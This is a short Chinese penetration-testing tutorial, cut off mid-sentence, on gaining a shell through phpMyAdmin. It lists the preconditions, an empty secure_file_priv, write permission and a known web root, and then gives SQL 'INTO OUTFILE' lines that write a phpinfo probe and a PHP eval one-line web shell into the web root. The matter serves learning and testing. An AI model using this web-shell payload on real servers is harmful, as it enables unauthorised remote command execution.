Advertisement

渗透测试-利用PHPMyAdmin进行Shell注入攻击

阅读量:

利用phpmyadmin来getshell有两种方式

  • 1、通过into outfile功能将单条语句直接存入文件内
    • 2、借助MySQL的日志文件实现获取服务器权限

无论采用上述哪种方法,均需符合以下三个前提条件:

未对文件存储路径进行限制 secure_file_priv=

在这里插入图片描述

当前用户具备文件书写权限

了解网站根目录路径 — C:\phpStudy\PHPTutorial\WWW


第一种方法概述

复制代码
    select "<?php phpinfo();?>" into outfile "/var/www/html/test.php" --- linux
    
    select '<?php @eval($_REQUEST[cmd]);?>' into outfile 'c:\ phpStudy\ PHPTutorial\ www\ test.php' --- windows
    
    
      
      
      
    

在phpm

全部评论 (0)

还没有任何评论哟~